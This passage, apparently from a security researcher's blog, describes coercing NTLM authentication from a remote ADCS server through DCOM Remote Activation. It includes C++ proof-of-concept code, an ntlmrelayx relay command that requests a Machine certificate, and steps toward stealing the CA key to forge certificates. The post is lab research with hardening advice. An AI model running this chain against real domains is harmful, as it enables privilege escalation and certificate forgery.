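    COSERVERINFO serverInfo = {};
    serverInfo.pwszName  = (LPWSTR)L"SRV1-MYLAB";
    serverInfo.pAuthInfo = &authInfo;

    MULTI_QI qi = {};
    qi.pIID = &IID_IUnknown;

    // Unmarshalling the IStorage trigger on the remote side forces the privileged service to
    // resolve the OXID at the redirector address embedded by IStorageTrigger::MarshalInterface
    return CoGetInstanceFromIStorage(&serverInfo, &clsid, NULL, CLSCTX_REMOTE_SERVER,
                                     pTriggerStorage, 1, &qi);
}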

And yes it worked 🙂 Dumping the NTLM messages received on our socket server we can see that we get an authentication type 3 message from the remote CA server (SRV1-MYLAB):

The network capture highlights that the Remote Activation requested by our low-privileged user was successful:

The final step is to forward the NTLM authentication to an external relay, such as ntlmrelayx, enabling authentication to another service as the CA computer itself.

Last but not least, since we have an RPC Client authenticating, we must encapsulate and forward the authentication messages using a protocol already implemented and supported in ntlmrelayx, such as HTTP.

I bet that now the fateful question arises:

Ok, regular domain users can coerce the authentication of an ADCS server from remote, intercept the authentication messages, and relay it, but is this really useful?

Well, considering the existence of other unpatched methods to coerce authentication of a Domain Controller, such as DFSCoerce, I would argue its utility may be limited.

To complicate matters further, due to the hardening MS recently made in DCOM, the only protocols that can be relayed at the moment are HTTP and SMB (if signing is not required).

In my lab, I tested the relay against the HTTP /CertSrv endpoint of a CA web enrollment server running on a different machine (guess why?… you cannot relay back to the same machine over the network). With no NTLM mitigations in place, I requested a Machine certificate for the CA server.
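For reference, the relay leg can be sketched with impacket’s ntlmrelayx against the web enrollment endpoint (the hostname is assumed):

ntlmrelayx.py -t http://webenroll.mylab.local/certsrv/certfnsh.asp --adcs --template Machine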

The attack flow is shown below:

With this certificate, I could then log onto the ADCS server in a highly privileged context. For example, I could back up the private key of the CA, ultimately enabling the forging of certificates on behalf of any user.

The POC

I rewrote some parts of our old JuicyPotato to adapt it to this new scenario. It’s a quick & dirty fix and somehow limited, but it was more than enough to achieve my goal 🙂

You can get rid of the socat redirector by using our JuicyPotatoNG code and implementing a fake Oxid Resolver like we did in RemotePotato0, with the extra bonus that you can also control the SPN and perform a Kerberos relay too… but I’ll leave it up to you 😉

Source Code: https://github.com/decoder-it/ADCSCoercePotato/

Conclusions

While the method I described for coercing authentication may not be groundbreaking, it offers interesting alternative ways to force the authentication of a remote server by abusing the Remote Activation permission granted to regular domain users.

This capability is limited to the Certificate Service DCOM Access group, which is populated only when the ADCS role is present. However, there could be legacy DCOM applications that grant Remote Activation to everyone.

Imagine DCOM Applications running under the context of the “Interactive User” with Remote Activation available to regular users. With cross-session implementation, you could also retrieve the authentication of a logged-in user 😉

Another valid reason to avoid installing unnecessary services on a Domain Controller, including the ADCS service!

That’s all 🙂
